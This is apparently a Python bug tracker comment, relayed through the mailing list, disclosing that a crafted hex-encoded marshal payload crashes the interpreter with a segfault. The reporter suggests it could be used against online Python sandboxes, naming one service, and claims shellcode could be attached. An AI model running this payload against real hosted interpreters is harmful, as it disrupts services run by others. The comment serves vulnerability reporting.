Iman Sharafodin <iman.sharafo...@gmail.com> added the comment:
There are many online Python interpreters, we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as their fully trust that Python doesn't generate segfault. For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though, they have protection mechanisms for file access and many other things. ----------- https://www.programiz.com/python-programming/online-compiler/ ----------- import io import marshal hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130" myb = bytes.fromhex(hex_string) f = io.BytesIO(myb) print(f) data = marshal.load(f) print(data) print('We have segfault but we cannot see!') ------------------- ---------- _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue41208> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
